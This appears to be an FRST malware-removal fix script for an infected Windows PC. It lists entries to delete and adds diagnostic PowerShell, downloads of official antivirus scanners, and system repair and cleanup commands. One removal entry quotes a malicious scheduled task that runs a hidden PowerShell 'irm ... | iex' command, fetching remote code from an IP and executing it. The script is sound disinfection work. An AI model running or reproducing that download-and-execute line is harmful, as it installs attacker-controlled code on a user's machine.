Start
SystemRestore: On
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
Task: {CE792EB2-ABEB-4AEB-B8D4-82B9D30D5C79} - System32\Tasks\InteractiveServices\MicrosoftWindowsDiagnosisCommandsWriteDiagTelemetryResourcesTask.CL-NCLS-1-5-21-1911753872-4082573132-1566520084-1001 => C:\Windows\System32\conhost.exe [1011712 2026-05-13] (Microsoft Windows -> Microsoft Corporation) -> --headless powershell -NoProfile -ExecutionPolicy Bypass -Command "irm 135.181.23542/a | iex" <==== ATTENTION
2026-06-10 11:46 - 2026-01-06 17:26 - 000000000 ____D C:\Users\Victus\AppData\Roaming\RenPy
AlternateDataStreams: C:\Windows:CM_be7995bdfc8d8ab791fbfefa187c3875a89ccddaea42f3929155d8af0adee7c6 [26]
AlternateDataStreams: C:\Users\Victus\Downloads\EpicInstaller-19.0.0 (1).msi:MBAM.Zone.Identifier [494]
AlternateDataStreams: C:\Users\Victus\Downloads\gadwcleaner.exe:MBAM.Zone.Identifier [282]
AlternateDataStreams: C:\Users\Victus\AppData\Local\Temp:$DATA​ [16]
FirewallRules: [{43888A3B-283A-480C-9E95-98F7D14A709B}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{C6C5698D-00E6-456A-AEB9-BA61DF8F5A25}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [TCP Query User{D366C2F9-BED1-480C-AACD-28B7FB6B8A14}C:\riot games\riot client\riotclientelectron\riot client.exe] => (Allow) C:\riot games\riot client\riotclientelectron\riot client.exe => No File
FirewallRules: [UDP Query User{C6484CB9-C1A8-4014-98BF-939AE2E7B5DE}C:\riot games\riot client\riotclientelectron\riot client.exe] => (Allow) C:\riot games\riot client\riotclientelectron\riot client.exe => No File
FirewallRules: [{90E3E3BC-08FE-4A4A-BCD9-F51E2070CCFA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls II Scholar of the First Sin\Game\DarkSoulsII.exe => No File
FirewallRules: [{A1FBAB7D-EC6B-4E8F-97D2-D5169DDB2E52}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls II Scholar of the First Sin\Game\DarkSoulsII.exe => No File
FirewallRules: [{78F77026-1962-422D-AEA2-41227B538D91}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DARK SOULS III\Game\DarkSoulsIII.exe => No File
FirewallRules: [{036153A7-041B-4028-B330-38EBDAA4ECA1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DARK SOULS III\Game\DarkSoulsIII.exe => No File
FirewallRules: [TCP Query User{2474BB46-5439-4460-AA84-974F0C71476D}C:\games\metaphor - refantazio\metaphor.exe] => (Block) C:\games\metaphor - refantazio\metaphor.exe => No File
FirewallRules: [UDP Query User{1D25B012-63D5-46A5-832D-393E35B1A1FB}C:\games\metaphor - refantazio\metaphor.exe] => (Block) C:\games\metaphor - refantazio\metaphor.exe => No File
FirewallRules: [TCP Query User{8649881D-FDD3-4495-923E-3F659D0381B2}C:\program files\kodi\kodi.exe] => (Allow) C:\program files\kodi\kodi.exe => No File
FirewallRules: [UDP Query User{0BF821E4-B843-4985-9725-87238AC9B0DD}C:\program files\kodi\kodi.exe] => (Allow) C:\program files\kodi\kodi.exe => No File
FirewallRules: [{2C5B6319-A246-4783-BE8B-DB04093866D8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Yume Nikki\yumenikki\RPG_RT.exe => No File
FirewallRules: [{F294BBD6-C08E-487A-B93F-597C78E2DFA2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Yume Nikki\yumenikki\RPG_RT.exe => No File
HKU\S-1-5-21-1911753872-4082573132-1566520084-1001\...\Run: [RiotClient] => C:\Riot Games\Riot Client\RiotClientServices.exe --launch-background-mode (No File)
HKU\S-1-5-21-1911753872-4082573132-1566520084-1001\...\MountPoints2: {24810604-50aa-11f0-9163-c0bfbee47f8b} - "G:\Autoplay.exe" -auto
HKU\S-1-5-21-1911753872-4082573132-1566520084-1001\...\MountPoints2: {24810671-50aa-11f0-9163-c0bfbee47f8b} - "F:\OInstall_x64.exe"
HKU\S-1-5-21-1911753872-4082573132-1566520084-1001\...\MountPoints2: {2481087f-50aa-11f0-9163-c0bfbee47f8b} - "E:\Autoplay.exe" -auto
Task: {19BB00A0-3574-48E1-AFCD-A82E7A42F583} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem148.0.7730.0{6577D887-8D62-466F-8B70-E4669178A52C} => "C:\Program Files (x86)\Google\GoogleUpdater\148.0.7730.0\updater.exe"  --wake --system (No File)
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe  (No File)
S2 GoogleUpdaterInternalService148.0.7730.0; "C:\Program Files (x86)\Google\GoogleUpdater\148.0.7730.0\updater.exe" --system --windows-service --service=update-internal (No File)
S2 GoogleUpdaterService148.0.7730.0; "C:\Program Files (x86)\Google\GoogleUpdater\148.0.7730.0\updater.exe" --system --windows-service --service=update (No File)
2025-09-11 15:55 - 2025-09-11 15:55 - 000000048 ____R () C:\Users\Victus\AppData\Local\80474006DEFACDB95D78F08DED6DE975
Folder: C:\WINDOWS\system32\Tasks\InteractiveServices
Folder: C:\Users\Victus\AppData\Roaming\KernelComponent_v3_0
Folder: C:\ProgramData\KernelComponent_v3_0
File: C:\Users\Victus\AppData\Local\CVault.exe
2026-06-10 11:47 - 2026-06-10 21:53 - 000000000 ____D C:\WINDOWS\system32\Tasks\InteractiveServices
2026-06-10 11:46 - 2026-06-10 11:46 - 001776016 _____ (AdRem Software Inc.) C:\Users\Victus\AppData\Local\CVault.exe
2026-06-10 11:46 - 2026-06-10 11:46 - 000000000 ____D C:\Users\Victus\AppData\Roaming\KernelComponent_v3_0
2026-06-10 11:46 - 2026-06-10 11:46 - 000000000 ____D C:\ProgramData\KernelComponent_v3_0
File: C:\Users\Victus\AppData\Roaming\Ground.exe
Startup: C:\Users\Victus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ground.lnk [2026-06-10]
ShortcutTarget: Ground.lnk -> C:\Users\Victus\AppData\Roaming\Ground.exe () [File not signed]
2026-04-29 15:24 - 2026-04-29 15:24 - 000534016 ___SH () C:\Users\Victus\AppData\Roaming\Ground.exe
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [0 2025-10-30] () <==== ATTENTION [zero byte File/Folder]
FirewallRules: [{08C4DED5-0E9B-4673-B40B-28C3B773A199}] => (Allow) C:\Program Files (x86)\Microsoft\Copilot\Application\mscopilot.exe () <==== ATTENTION [zero byte File/Folder]
HKU\S-1-5-21-1911753872-4082573132-1566520084-1001\...\Policies\Explorer: []
File: C:\WINDOWS\system32\Drivers\BuHt.winsecurity
2026-06-08 04:46 - 2025-06-24 07:18 - 000003486 _____ C:\WINDOWS\system32\Tasks\MAkF7mCn3tPqp662daybvERzwsKQYqnzM8{3CBBF4EB-841F-45F2-A11E-95871801B61F}

Powershell: Get-ScheduledTask | select -first 30 | Get-ScheduledTaskInfo
Powershell: @("$env:APPDATA","$env:LOCALAPPDATA") | ForEach-Object { Get-ChildItem $_ -Recurse -Filter "index.js" -ErrorAction SilentlyContinue } | Where-Object { $_.FullName -match "discord_desktop_core" } | ForEach-Object { Write-Host "--- $($_.FullName) ---"; (Get-Content $_.FullName -Raw).Substring(0,[Math]::Min(2000,(Get-Content $_.FullName -Raw).Length)) }
Powershell: (Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -ErrorAction SilentlyContinue).PSObject.Properties | Where-Object { $_.Name -match "^[a-z]$" } | ForEach-Object { Write-Host "$($_.Name): $($_.Value)" }

C:\WINDOWS\Temp\*
C:\WINDOWS\SystemTemp\*
C:\Users\Victus\AppData\Local\Temp\*

StartBatch:
rem This snippet downloads KVRT (Kaspersky Virus Removal Tool) directly from Kaspersky and scans with it
rem IMPORTANT: This currently (to my knowledge) scans only the following: System memory, Startup objects, Boot sectors
rem            To perform a full scan (which possibly may take longer than an hour, so not recommended,) please use the argument "-allvolumes"
rem It is better to keep it only as a scanner because cleaning modes tend to restart which break the fix process.
%windir%\System32\curl.exe --silent "https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe" -o "C:\FRST\KASVRT.exe"
C:\FRST\KASVRT.exe -silent -adinsilent -accepteula -processlevel 0 -dontencrypt >> "C:\FRST\KVRT_log.txt"
type "C:\FRST\KVRT_log.txt"
exit
EndBatch:

StartPowerShell:
# This snippet downloads Emsisoft Emergency Kit (EEK) from the Emsisoft's official site, updates it, scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUP's in 1) system memory 2) important folders as documentation says
# It will scan in compressed archives, in mail archives, in NTFS alternate data streams and use cloud requests
# ---
# You can use argument "/delete" to delete found objects including references but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan but that may take longer than what FRST can handle.
# You can use argument "/quarantine="[folder]"" to put found malware into quarantine, but I personally prefer first verifying the detections.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath = "$systemDrive\FRST"
$savePath = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
if (-not (Test-Path $frstPath)) {
    New-Item -Path $frstPath -ItemType Directory -Force | Out-Null
}
if (-not (Test-Path $extractPath)) {
    New-Item -Path $extractPath -ItemType Directory -Force | Out-Null
}
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
while (-not (Test-Path "$extractPath\bin64\a2cmd.exe")) { Start-Sleep -Milliseconds 1000 }
Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
if ([Environment]::Is64BitOperatingSystem) {
    $a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe"
} else {
    $a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe"
}
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit
EndPowerShell:

StartPowershell:
# Replace /scanonly with /clean if you also want to delete items -- however, this will activate a trial license on the system, I do not recommend it
$hmpExe  = "$env:TEMP\HitmanPro_x64.exe"
$logFile = "$env:TEMP\HitmanPro_ScanLog.txt"
Invoke-WebRequest -Uri "https://dl.surfright.nl/HitmanPro_x64.exe" -OutFile $hmpExe -UseBasicParsing
$proc = Start-Process $hmpExe -ArgumentList "/ews","/scanonly","/noinstall","/log=`"$logFile`"","/logtype=txt" -Wait -PassThru
if (!(Test-Path $logFile)) { Write-Host "Scan failed (exit $($proc.ExitCode))"; exit 1 }
Get-Content $logFile -Encoding Unicode
EndPowershell:

CMD: DISM /Online /Cleanup-Image /RestoreHealth
CMD: sfc /scannow
CMD: findstr /c:"[SR]" %windir%\logs\cbs\cbs.log >> "%userprofile%\desktop\sfcdetails.txt"
CMD: type "%userprofile%\desktop\sfcdetails.txt"

cmd: del %temp%\*.* /f /s /q
cmd: rd /s /q %temp%
cmd: bitsadmin /reset /allusers
cmd: netsh winsock reset catalog
cmd: ipconfig /flushdns
RemoveProxy:
EmptyTemp:
End